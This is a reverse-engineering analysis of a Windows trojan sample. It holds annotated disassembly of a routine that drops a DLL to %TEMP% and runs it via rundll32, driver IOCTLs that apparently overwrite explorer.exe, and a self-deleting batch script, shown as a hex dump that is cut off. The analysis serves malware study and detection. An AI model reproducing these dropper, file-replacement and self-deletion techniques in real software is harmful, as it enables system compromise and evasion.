00401B10 |. 8D4424 08 lea eax, dword ptr [esp+8] ; = stack string at [esp+0] (contents elided above)
00401B14 |. 68 E4104000 push 004010E4
00401B19 |. 50 push eax
00401B1A |. 68 C8124000 push 004012C8 ; open
00401B1F |. 6A 00 push 0
00401B21 |. E8 1AF9FFFF call <动态获得函数地址并运行文件> ; ShellExecuteA-shaped (0, "open", file, 004010E4, 0, 0); helper not in listing
00401B26 |. 6A 00 push 0
00401B28 |. 6A 00 push 0
00401B2A |. 8D4C24 38 lea ecx, dword ptr [esp+38] ; second stack string
00401B2E |. 68 E4104000 push 004010E4
00401B33 |. 51 push ecx
00401B34 |. 68 C8124000 push 004012C8 ; open
00401B39 |. 6A 00 push 0
00401B3B |. E8 00F9FFFF call <动态获得函数地址并运行文件>
00401B40 |. 6A 00 push 0
00401B42 |. 6A 00 push 0
00401B44 |. 8D5424 70 lea edx, dword ptr [esp+70] ; third stack string
00401B48 |. 68 E4104000 push 004010E4
00401B4D |. 52 push edx
00401B4E |. 68 C8124000 push 004012C8 ; open
00401B53 |. 6A 00 push 0
00401B55 |. E8 E6F8FFFF call <动态获得函数地址并运行文件>
00401B5A |. 83C4 48 add esp, 48 ; 3 x 18h bytes of args cleaned at once -> helper is cdecl
00401B5D |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
00401B62 |. FF15 9C104000 call dword ptr [40109C] ; \Sleep
00401B68 |> 83C4 58 add esp, 58
00401B6B \. C3 retn
关键call 2
; ----------------------------------------------------------------------
; 00401CE0  key call 2: drop a DLL into %TEMP% and load it via rundll32
; No arguments. Steps visible below:
;   1. name  = wsprintfA("%d.dll", GetTickCount())   (analyst: 44810500.dll)
;   2. path  = GetTempPathA() + name   -- %TEMP%, NOT system32 as the
;      post's summary and the main routine's comment claim
;   3. <创建文件>(path, 66h)          -- writes the DLL (helper not shown)
;   4. cmd   = "rundll32.exe " + path + " testall"   (export name "testall")
;   5. CreateProcessA(NULL, cmd, ..., bInheritHandles=TRUE, STARTUPINFO
;      with cb=44h); on success CloseHandle(hThread) then
;      WaitForSingleObject(hProcess, INFINITE) -- the dropper blocks until
;      rundll32 exits
;   6. DeleteFileA(cmd) -- passes the WHOLE command line as the file name,
;      so the delete almost certainly fails and the DLL stays in %TEMP%
;      (useful forensic artefact)
; Stack frame: 354h bytes; buffers at [esp+60] (path/cmd tail),
;   [esp+160] (full command line), [esp+260] (file name); STARTUPINFO at
;   [esp+1C], PROCESS_INFORMATION at [esp+C] (offsets before the pushes).
; Registers: esi = lstrcatA, ebx = lstrcpyA, edi = stos target.
; ----------------------------------------------------------------------
00401CE0 /$ 81EC 54030000 sub esp, 354
00401CE6 |. 53 push ebx
00401CE7 |. 56 push esi
00401CE8 |. 57 push edi
00401CE9 |. B9 3F000000 mov ecx, 3F
00401CEE |. 33C0 xor eax, eax
00401CF0 |. 8D7C24 60 lea edi, dword ptr [esp+60]
00401CF4 |. F3:AB rep stos dword ptr es:[edi]
00401CF6 |. 66:AB stos word ptr es:[edi]
00401CF8 |. AA stos byte ptr es:[edi]
00401CF9 |. B9 3F000000 mov ecx, 3F
00401CFE |. 33C0 xor eax, eax
00401D00 |. 8DBC24 60020000 lea edi, dword ptr [esp+260]
00401D07 |. F3:AB rep stos dword ptr es:[edi]
00401D09 |. 66:AB stos word ptr es:[edi]
00401D0B |. AA stos byte ptr es:[edi]
00401D0C |. B9 3F000000 mov ecx, 3F
00401D11 |. 33C0 xor eax, eax
00401D13 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D1A |. F3:AB rep stos dword ptr es:[edi]
00401D1C |. 66:AB stos word ptr es:[edi]
00401D1E |. AA stos byte ptr es:[edi]
00401D1F |. FF15 68104000 call dword ptr [401068] ; [GetTickCount  -- DLL name varies per run
00401D25 |. 50 push eax ; /<%d>
00401D26 |. 8D8424 64020000 lea eax, dword ptr [esp+264] ; |
00401D2D |. 68 54134000 push 00401354 ; |%d.dll
00401D32 |. 50 push eax ; |s
00401D33 |. FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
00401D39 |. 83C4 0C add esp, 0C ; 44810500.dll
00401D3C |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D40 |. 51 push ecx ; /Buffer
00401D41 |. 68 FF000000 push 0FF ; |BufSize = FF (255.)
00401D46 |. FF15 AC104000 call dword ptr [4010AC] ; \GetTempPathA  -- the drop directory is %TEMP%
00401D4C |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401D52 |. 8D9424 60020000 lea edx, dword ptr [esp+260]
00401D59 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401D5D |. 52 push edx ; /StringToAdd
00401D5E |. 50 push eax ; |ConcatString
00401D5F |. FFD6 call esi ; \lstrcatA
00401D61 |. 8D4C24 60 lea ecx, dword ptr [esp+60] ; [esp+60] = <TempPath><tick>.dll (analyst: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll)
00401D65 |. 6A 66 push 66 ; 66h -- selector for <创建文件>
00401D67 |. 51 push ecx
00401D68 |. E8 C3FAFFFF call <创建文件> //创建 44810500.dll文件 ; writes the DLL at [esp+60]
00401D6D |. 8B1D 8C104000 mov ebx, dword ptr [40108C] ; kernel32.lstrcpyA
00401D73 |. 8D5424 60 lea edx, dword ptr [esp+60]
00401D77 |. 8D8424 60010000 lea eax, dword ptr [esp+160]
00401D7E |. 52 push edx ; /String2
00401D7F |. 50 push eax ; |String1
00401D80 |. FFD3 call ebx ; \lstrcpyA  (scratch copy into [esp+160]; overwritten again below)
00401D82 |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D86 |. 68 48134000 push 00401348 ; testall  (" testall" -- exported function name handed to rundll32)
00401D8B |. 51 push ecx
00401D8C |. FFD6 call esi ; lstrcatA: [esp+60] = "<dll path> testall"
00401D8E |. B9 3F000000 mov ecx, 3F
00401D93 |. 33C0 xor eax, eax
00401D95 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D9C |. 8D9424 60010000 lea edx, dword ptr [esp+160]
00401DA3 |. F3:AB rep stos dword ptr es:[edi]
00401DA5 |. 66:AB stos word ptr es:[edi]
00401DA7 |. 68 38134000 push 00401338 ; rundll32.exe
00401DAC |. 52 push edx
00401DAD |. AA stos byte ptr es:[edi]
00401DAE |. FFD3 call ebx ; kernel32.lstrcpyA  [esp+160] = "rundll32.exe "
00401DB0 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401DB4 |. 8D8C24 60010000 lea ecx, dword ptr [esp+160]
00401DBB |. 50 push eax
00401DBC |. 51 push ecx
00401DBD |. FFD6 call esi ; lstrcatA: [esp+160] = "rundll32.exe <dll path> testall"
00401DBF |. B9 11000000 mov ecx, 11
00401DC4 |. 33C0 xor eax, eax
00401DC6 |. 8D7C24 1C lea edi, dword ptr [esp+1C]
00401DCA |. 8D5424 0C lea edx, dword ptr [esp+C]
00401DCE |. F3:AB rep stos dword ptr es:[edi] ; zero 11h dwords = 44h-byte STARTUPINFO at [esp+1C]
00401DD0 |. 8D4C24 1C lea ecx, dword ptr [esp+1C]
00401DD4 |. 52 push edx ; /pProcessInfo
00401DD5 |. 51 push ecx ; |pStartupInfo
00401DD6 |. C74424 24 44000000 mov dword ptr [esp+24], 44 ; | STARTUPINFO.cb = 44h
00401DDE |. 894424 50 mov dword ptr [esp+50], eax ; | (eax = 0) looks like dwFlags -- offsets not independently verified
00401DE2 |. 66:C74424 54 0500 mov word ptr [esp+54], 5 ; | looks like wShowWindow = 5; with dwFlags = 0 it would be ignored -- verify
00401DE9 |. 894424 60 mov dword ptr [esp+60], eax ; |
00401DED |. 894424 64 mov dword ptr [esp+64], eax ; |
00401DF1 |. 50 push eax ; |CurrentDir => NULL
00401DF2 |. 50 push eax ; |pEnvironment => NULL
00401DF3 |. 50 push eax ; |CreationFlags => 0
00401DF4 |. 6A 01 push 1 ; |InheritHandles = TRUE
00401DF6 |. 50 push eax ; |pThreadSecurity => NULL
00401DF7 |. 8D9424 7C010000 lea edx, dword ptr [esp+17C] ; | = [esp+160] before the 7 pushes
00401DFE |. 50 push eax ; |pProcessSecurity => NULL
00401DFF |. 52 push edx ; |CommandLine
00401E00 |. 50 push eax ; |ModuleFileName => NULL
00401E01 |. FF15 60104000 call dword ptr [401060] ; \CreateProcessA
00401E07 |. 5F pop edi ; CommandLine = "rundll32.exe <TempPath><tick>.dll testall" (analyst: rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall)
00401E08 |. 5E pop esi
00401E09 |. 85C0 test eax, eax
00401E0B |. 5B pop ebx
00401E0C |. 74 18 je short 00401E26 ; CreateProcessA failed -> skip the wait
00401E0E |. 8B4424 04 mov eax, dword ptr [esp+4] ; PROCESS_INFORMATION.hThread
00401E12 |. 50 push eax ; /hObject
00401E13 |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401E19 |. 8B4C24 00 mov ecx, dword ptr [esp] ; PROCESS_INFORMATION.hProcess
00401E1D |. 6A FF push -1 ; /Timeout = INFINITE
00401E1F |. 51 push ecx ; |hObject
00401E20 |. FF15 5C104000 call dword ptr [40105C] ; \WaitForSingleObject  -- blocks until rundll32 exits; hProcess is never closed
00401E26 |> 8D9424 54010000 lea edx, dword ptr [esp+154] ; = [esp+160] before the 3 pops, i.e. the full command line, not the DLL path
00401E2D |. 52 push edx ; //FileName = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"
00401E2E |. FF15 A0104000 call dword ptr [4010A0] ; \DeleteFileA  -- called on the command-line string; expected to fail, leaving the DLL on disk
00401E34 |. 81C4 54030000 add esp, 354
00401E3A \. C3 retn
关键call 3
; ----------------------------------------------------------------------
; 00401650  key call 3: send two IOCTLs to the dropped driver
; cdecl, 2 args (the caller cleans):
;   arg1 [esp+240 after prologue] -- from main: "\??\<WinDir>\Explorer.EXE"
;   arg2 [esp+248]                -- from main: "\??\<own image path>"
; Steps visible below:
;   1. CreateFileA("\\.\pcidump", GENERIC_READ|GENERIC_WRITE, share 0,
;      OPEN_EXISTING) -- the device name is built byte-wise at [esp+0..B]
;      (5C 5C 2E 5C 70 63 69 64 75 6D 70 00)
;   2. `test edi,edi` treats 0 as failure, but CreateFileA returns
;      INVALID_HANDLE_VALUE (-1) on error, so a failed open falls through
;      and the IOCTLs are issued with hDevice = -1 (a bug in the sample)
;   3. if global byte [401278] != 0 (main clears it when running as
;      Explorer.EXE): lstrcpyA(004010E8, arg1); lstrcpyA(004011B0,
;      "<SysDir>" + two 8-byte stack strings built from [4012AC..4012B8],
;      analyst: "...\drivers\gm.dls"); DeviceIoControl(0x222014,
;      InBuffer = {004010E8, 004011B0}, 8 bytes, no output)
;   4. Sleep 3 s; lstrcpyA(004010E8, arg2); lstrcpyA(004011B0, arg1);
;      DeviceIoControl(0x222014, same 8-byte pointer pair)
;   5. Sleep 3 s; return 0
; The InBuffer is a pair of pointers into the image's own .data; what the
; driver does with them is not on this page (the analyst: it rewrites
; gm.dls / explorer.exe). IOCTL 222014h on \\.\pcidump is the detectable
; signal here.
; Registers: edi = hDevice, ebp = arg1, esi = lstrcpyA, ebx = lstrcatA
; then Sleep.
; Returns: eax = 0 on the normal path; on the (buggy) handle==0 path eax
; is loaded from an uninitialised stack slot [esp+10].
; ----------------------------------------------------------------------
00401650 /$ 81EC 30020000 sub esp, 230
00401656 |. 8A0D C0124000 mov cl, byte ptr [4012C0]
0040165C |. B0 5C mov al, 5C ; '\'
0040165E |. 884424 00 mov byte ptr [esp], al ; device name "\\.\pcidump": bytes 0,1,3 = '\'
00401662 |. 884424 01 mov byte ptr [esp+1], al
00401666 |. 884424 03 mov byte ptr [esp+3], al
0040166A |. B0 70 mov al, 70 ; 'p'
0040166C |. 884424 04 mov byte ptr [esp+4], al
00401670 |. 884424 0A mov byte ptr [esp+A], al
00401674 |. A1 BC124000 mov eax, dword ptr [4012BC]
00401679 |. 57 push edi
0040167A |. 894424 1C mov dword ptr [esp+1C], eax ; 5 bytes from .data ([4012BC], [4012C0]) -> stack string at pre-push [esp+18]
0040167E |. 884C24 20 mov byte ptr [esp+20], cl
00401682 |. B9 3F000000 mov ecx, 3F
00401687 |. 33C0 xor eax, eax
00401689 |. 8D7C24 34 lea edi, dword ptr [esp+34]
0040168D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040168F |. F3:AB rep stos dword ptr es:[edi] ; |
00401691 |. 66:AB stos word ptr es:[edi] ; |
00401693 |. AA stos byte ptr es:[edi] ; |
00401694 |. B9 3F000000 mov ecx, 3F ; |
00401699 |. 33C0 xor eax, eax ; |
0040169B |. 8DBC24 38010000 lea edi, dword ptr [esp+138] ; |
004016A2 |. 68 80000000 push 80 ; |Attributes = NORMAL
004016A7 |. F3:AB rep stos dword ptr es:[edi] ; |
004016A9 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004016AB |. 6A 00 push 0 ; |pSecurity = NULL
004016AD |. 66:AB stos word ptr es:[edi] ; |
004016AF |. 6A 00 push 0 ; |ShareMode = 0
004016B1 |. 8D5424 18 lea edx, dword ptr [esp+18] ; | = pre-push [esp+0], the device name
004016B5 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004016BA |. 52 push edx ; |FileName
004016BB |. C64424 22 2E mov byte ptr [esp+22], 2E ; | '.' at name offset 2
004016C0 |. C64424 25 63 mov byte ptr [esp+25], 63 ; | "cidum" at offsets 5..9
004016C5 |. C64424 26 69 mov byte ptr [esp+26], 69 ; |
004016CA |. C64424 27 64 mov byte ptr [esp+27], 64 ; |
004016CF |. C64424 28 75 mov byte ptr [esp+28], 75 ; |
004016D4 |. C64424 29 6D mov byte ptr [esp+29], 6D ; |
004016D9 |. C64424 2B 00 mov byte ptr [esp+2B], 0 ; | NUL at offset B -> "\\.\pcidump"
004016DE |. AA stos byte ptr es:[edi] ; |
004016DF |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
004016E5 |. 8BF8 mov edi, eax ; edi = hDevice
004016E7 |. 85FF test edi, edi
004016E9 |. 0F84 2D010000 je 0040181C ; checks for 0, but failure is INVALID_HANDLE_VALUE (-1): a failed open is not caught
004016EF |. A0 78124000 mov al, byte ptr [401278] ; global flag cleared by main when running as Explorer.EXE
004016F4 |. 53 push ebx
004016F5 |. 55 push ebp
004016F6 |. 8BAC24 40020000 mov ebp, dword ptr [esp+240] ; ebp = arg1
004016FD |. 56 push esi
004016FE |. 8B35 8C104000 mov esi, dword ptr [40108C] ; kernel32.lstrcpyA
00401704 |. 84C0 test al, al
00401706 |. 0F84 A8000000 je 004017B4 ; flag == 0 -> skip the first IOCTL
0040170C |. 8B0D B0124000 mov ecx, dword ptr [4012B0]
00401712 |. A1 AC124000 mov eax, dword ptr [4012AC]
00401717 |. 8B15 B4124000 mov edx, dword ptr [4012B4]
0040171D |. 894C24 34 mov dword ptr [esp+34], ecx ; 16 bytes copied from .data [4012AC..4012B8] into two stack strings
00401721 |. 894424 30 mov dword ptr [esp+30], eax
00401725 |. A1 B8124000 mov eax, dword ptr [4012B8]
0040172A |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
00401731 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
00401736 |. 51 push ecx ; |Buffer
00401737 |. 895424 40 mov dword ptr [esp+40], edx ; |
0040173B |. 894424 44 mov dword ptr [esp+44], eax ; |
0040173F |. FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00401745 |. 8D5424 28 lea edx, dword ptr [esp+28]
00401749 |. 8D4424 40 lea eax, dword ptr [esp+40]
0040174D |. 52 push edx ; /String2
0040174E |. 50 push eax ; |String1
0040174F |. FFD6 call esi ; \lstrcpyA
00401751 |. 8B1D 94104000 mov ebx, dword ptr [401094] ; kernel32.lstrcatA
00401757 |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
0040175E |. 8D5424 40 lea edx, dword ptr [esp+40]
00401762 |. 51 push ecx ; /StringToAdd
00401763 |. 52 push edx ; |ConcatString
00401764 |. FFD3 call ebx ; \lstrcatA  += <SysDir>
00401766 |. 8D4424 30 lea eax, dword ptr [esp+30]
0040176A |. 8D4C24 40 lea ecx, dword ptr [esp+40]
0040176E |. 50 push eax ; /StringToAdd
0040176F |. 51 push ecx ; |ConcatString
00401770 |. FFD3 call ebx ; \lstrcatA  (analyst: result is "C:\WINDOWS\system32\drivers\gm.dls")
00401772 |. 55 push ebp ; /String2  = arg1
00401773 |. 68 E8104000 push 004010E8 ; |123321  (destination buffer in .data; "123321" is its initial content)
00401778 |. FFD6 call esi ; \lstrcpyA
0040177A |. 8D5424 40 lea edx, dword ptr [esp+40]
0040177E |. 52 push edx ; /String2
0040177F |. 68 B0114000 push 004011B0 ; |String1 = 412489_f.004011B0
00401784 |. FFD6 call esi ; \lstrcpyA
00401786 |. 8D4424 1C lea eax, dword ptr [esp+1C]
0040178A |. 6A 00 push 0 ; /pOverlapped = NULL
0040178C |. 50 push eax ; |pBytesReturned
0040178D |. 6A 00 push 0 ; |OutBufferSize = 0
0040178F |. 6A 00 push 0 ; |OutBuffer = NULL
00401791 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
00401795 |. 6A 08 push 8 ; |InBufferSize = 8  (two 32-bit pointers)
00401797 |. 51 push ecx ; |InBuffer
00401798 |. 68 14202200 push 222014 ; |IoControlCode = 222014
0040179D |. 57 push edi ; |hDevice
0040179E |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |InBuffer[0] -> 004010E8 (now holds arg1)
004017A6 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; |InBuffer[1] -> 004011B0 (analyst: C:\WINDOWS\system32\drivers\gm.dls)
004017AE |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl  (return value not checked)
004017B4 |> 8B1D 9C104000 mov ebx, dword ptr [40109C] ; kernel32.Sleep
004017BA |. 68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
004017BF |. FFD3 call ebx ; \Sleep
004017C1 |. 8B9424 48020000 mov edx, dword ptr [esp+248] ; edx = arg2
004017C8 |. 52 push edx
004017C9 |. 68 E8104000 push 004010E8 ; 123321
004017CE |. FFD6 call esi ; lstrcpyA(004010E8, arg2)
004017D0 |. 55 push ebp
004017D1 |. 68 B0114000 push 004011B0 ; ASCII "\??\C:\WINDOWS\Explorer.EXE"
004017D6 |. FFD6 call esi ; lstrcpyA(004011B0, arg1)
004017D8 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004017DC |. 6A 00 push 0 ; /pOverlapped = NULL
004017DE |. 50 push eax ; |pBytesReturned
004017DF |. 6A 00 push 0 ; |OutBufferSize = 0
004017E1 |. 6A 00 push 0 ; |OutBuffer = NULL
004017E3 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
004017E7 |. 6A 08 push 8 ; |InBufferSize = 8
004017E9 |. 51 push ecx ; |InBuffer
004017EA |. 68 14202200 push 222014 ; |IoControlCode = 222014
004017EF |. 57 push edi ; |hDevice
004017F0 |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |InBuffer[0] -> 004010E8 (now arg2, own image path)
004017F8 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; | |InBuffer[1] -> 004011B0 (arg1, ASCII "\??\C:\WINDOWS\Explorer.EXE")
00401800 |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
00401806 |. 68 B80B0000 push 0BB8 ; (analyst) DeviceIoControl is how the sample talks to the driver, for both the read and the write operation
0040180B |. 33F6 xor esi, esi ; return value 0
0040180D |. FFD3 call ebx ; Sleep 3000 ms
0040180F |. 8BC6 mov eax, esi
00401811 |. 5E pop esi
00401812 |. 5D pop ebp
00401813 |. 5B pop ebx
00401814 |. 5F pop edi
00401815 |. 81C4 30020000 add esp, 230
0040181B |. C3 retn
0040181C |> 8B4424 10 mov eax, dword ptr [esp+10] ; hDevice == 0 path: eax taken from an uninitialised stack slot -- presumably meant as an error code, TODO confirm
00401820 |. 5F pop edi
00401821 |. 81C4 30020000 add esp, 230
00401827 \. C3 retn
关键call 4
; ---------------------------------------------------------------------
; sub_401B70 -- self-delete routine (the author's "key call 4").
; Builds a batch script in a 0x800-byte stack buffer, writes it to
; "kl78a.bat" (relative name -> current directory), launches it through
; the ShellExecuteA forwarder at 00401440 and then calls ExitProcess.
; Stack layout (offsets relative to esp after the two prologue pushes):
;   [esp+8]   10 bytes copied from 0040132C/00401330/00401334 -- the
;             "kl78a.bat" name the debugger shows at 00401C85
;   [esp+14]  DWORD bytes-written slot for WriteFile
;   [esp+18]  0x104 (MAX_PATH) buffer: own module path
;   [esp+11C] 0x800 buffer: the script text
; The finished script is shown in the hex dump that follows this listing.
; ---------------------------------------------------------------------
00401B70 /$ 81EC 14090000 sub esp, 914
00401B76 |. 56 push esi
00401B77 |. 57 push edi
00401B78 |. B9 40000000 mov ecx, 40 ; 0x40 dwords + word + byte + the byte at [esp+18] = 0x104 bytes cleared
00401B7D |. 33C0 xor eax, eax
00401B7F |. 8D7C24 19 lea edi, dword ptr [esp+19]
00401B83 |. C64424 18 00 mov byte ptr [esp+18], 0 ; start of the module-path buffer
00401B88 |. F3:AB rep stos dword ptr es:[edi]
00401B8A |. 66:AB stos word ptr es:[edi]
00401B8C |. AA stos byte ptr es:[edi]
00401B8D |. B9 FF010000 mov ecx, 1FF ; 0x1FF dwords + word + byte + the byte at [esp+11C] = 0x800 bytes cleared
00401B92 |. 33C0 xor eax, eax
00401B94 |. 8DBC24 1D010000 lea edi, dword ptr [esp+11D]
00401B9B |. C68424 1C010000 00 mov byte ptr [esp+11C], 0 ; start of the script buffer
00401BA3 |. F3:AB rep stos dword ptr es:[edi]
00401BA5 |. 66:AB stos word ptr es:[edi]
00401BA7 |. 8B0D 30134000 mov ecx, dword ptr [401330] ; bytes 4..7 of the 10-byte file name
00401BAD |. 66:8B15 34134000 mov dx, word ptr [401334] ; bytes 8..9 of the file name
00401BB4 |. AA stos byte ptr es:[edi]
00401BB5 |. A1 2C134000 mov eax, dword ptr [40132C] ; bytes 0..3 of the file name
00401BBA |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401BBF |. 894424 0C mov dword ptr [esp+C], eax ; | -> [esp+8] before this push
00401BC3 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; | -> the [esp+18] buffer
00401BC7 |. 50 push eax ; |PathBuffer
00401BC8 |. 6A 00 push 0 ; |hModule = NULL -> own executable
00401BCA |. 894C24 18 mov dword ptr [esp+18], ecx ; | -> [esp+C] before the pushes
00401BCE |. 66:895424 1C mov word ptr [esp+1C], dx ; | -> [esp+10] before the pushes
00401BD3 |. FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA -- path of this exe, used for the del line below
00401BD9 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401BE0 |. 68 20134000 push 00401320 ; /@echo off\n\rkl78a.bat -- only "@echo off\n\r" is copied; "kl78a.bat" is the next string in .rdata
00401BE5 |. 51 push ecx ; |String1
00401BE6 |. FF15 8C104000 call dword ptr [40108C] ; \lstrcpyA -- script = "@echo off\n\r"
00401BEC |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA -- esi = lstrcatA for all appends below
00401BF2 |. BF 0A000000 mov edi, 0A ; loop counter: 10 iterations
00401BF7 |> 8D9424 1C010000 /lea edx, dword ptr [esp+11C]
00401BFE |. 68 08134000 |push 00401308 ; @echo kklfa>>11.ca\n\r -- appended 10 times; presumably filler to delay the del until this process has exited
00401C03 |. 52 |push edx
00401C04 |. FFD6 |call esi
00401C06 |. 4F |dec edi
00401C07 |.^ 75 EE \jnz short 00401BF7
00401C09 |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C10 |. 68 F8124000 push 004012F8 ; @del 11.ca\n\r -- removes the filler file
00401C15 |. 50 push eax
00401C16 |. FFD6 call esi
00401C18 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C1F |. 68 F0124000 push 004012F0 ; @del " -- opening quote of the quoted exe path
00401C24 |. 51 push ecx
00401C25 |. FFD6 call esi
00401C27 |. 8D5424 18 lea edx, dword ptr [esp+18] ; own module path from GetModuleFileNameA
00401C2B |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C32 |. 52 push edx
00401C33 |. 50 push eax
00401C34 |. FFD6 call esi ; script += <own exe path>
00401C36 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C3D |. 68 EC124000 push 004012EC ; "\n\r@del " -- closing quote + line break (the dump shows "...exe"\n\r@del kl78a.bat")
00401C42 |. 51 push ecx
00401C43 |. FFD6 call esi
00401C45 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C4C |. 68 E4124000 push 004012E4 ; @del -- the "@del " that precedes the script's own name
00401C51 |. 52 push edx
00401C52 |. FFD6 call esi
00401C54 |. 8D4424 08 lea eax, dword ptr [esp+8] ; "kl78a.bat"
00401C58 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C5F |. 50 push eax
00401C60 |. 51 push ecx
00401C61 |. FFD6 call esi ; script += "kl78a.bat" (the script deletes itself last)
00401C63 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C6A |. 68 DC124000 push 004012DC ; \n\r@exit@del -- only "\n\r@exit" belongs to this string
00401C6F |. 52 push edx
00401C70 |. FFD6 call esi
00401C72 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401C74 |. 6A 00 push 0 ; |Attributes = 0
00401C76 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401C78 |. 6A 00 push 0 ; |pSecurity = NULL
00401C7A |. 6A 00 push 0 ; |ShareMode = 0
00401C7C |. 8D4424 1C lea eax, dword ptr [esp+1C] ; | -> [esp+8] before the five pushes
00401C80 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00401C85 |. 50 push eax ; |0012EB10 0012EB34 |FileName = "kl78a.bat" -- relative name, so it lands in the current directory
00401C86 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA -- NOTE(review): result is never compared with INVALID_HANDLE_VALUE before WriteFile
00401C8C |. 8D4C24 14 lea ecx, dword ptr [esp+14] ; bytes-written slot
00401C90 |. 6A 00 push 0 ; /pOverlapped = NULL
00401C92 |. 51 push ecx ; |pBytesWritten
00401C93 |. 8D9424 24010000 lea edx, dword ptr [esp+124] ; | -> script buffer ([esp+11C] before the two pushes)
00401C9A |. 8BF0 mov esi, eax ; | esi = file handle (lstrcatA pointer no longer needed)
00401C9C |. 68 00080000 push 800 ; |nBytesToWrite = 800 (2048.) -- the whole buffer, so the .bat carries NUL padding after the script text
00401CA1 |. 52 push edx ; |Buffer
00401CA2 |. 56 push esi ; |hFile
00401CA3 |. FF15 30104000 call dword ptr [401030] ; \WriteFile
00401CA9 |. 56 push esi ; /hObject
00401CAA |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401CB0 |. 6A 00 push 0 ; nShowCmd = 0 (SW_HIDE) -- args are pushed last-to-first for the cdecl forwarder
00401CB2 |. 6A 00 push 0 ; lpDirectory = NULL
00401CB4 |. 8D4424 10 lea eax, dword ptr [esp+10] ; -> [esp+8] before the two pushes = "kl78a.bat"
00401CB8 |. 68 E4104000 push 004010E4 ; lpParameters -- string at 004010E4 is not annotated in the listing
00401CBD |. 50 push eax ; lpFile = "kl78a.bat"
00401CBE |. 68 C8124000 push 004012C8 ; open -- lpOperation
00401CC3 |. 6A 00 push 0 ; hwnd = NULL
00401CC5 |. E8 76F7FFFF call <动态获得函数地址并运行文件> ; sub_401440: LoadLibrary/GetProcAddress shell32!ShellExecuteA and forward these six args
00401CCA |. 83C4 18 add esp, 18 ; caller cleans the six DWORD args (cdecl)
00401CCD |. 6A 00 push 0 ; /ExitCode = 0
00401CCF \. FF15 54104000 call dword ptr [401054] ; \ExitProcess -- exits so the script can delete the exe; never returns
Bat内容:
0012EC48 40 65 63 68 6F 20 6F 66 66 0A 0D 40 65 63 68 6F @echo off..@echo
0012EC58 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012EC68 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012EC78 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012EC88 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012EC98 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECA8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ECB8 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ECC8 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012ECD8 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012ECE8 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECF8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ED08 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ED18 61 0A 0D 40 64 65 6C 20 31 31 2E 63 61 0A 0D 40 a..@del 11.ca..@
0012ED28 64 65 6C 20 22 43 3A 5C 74 72 6F 6A 61 6E 5C 74 del "C:\trojan\t
0012ED38 72 6F 6A 61 6E 5C 34 31 32 34 38 39 5F 66 6D 30 rojan\412489_fm0
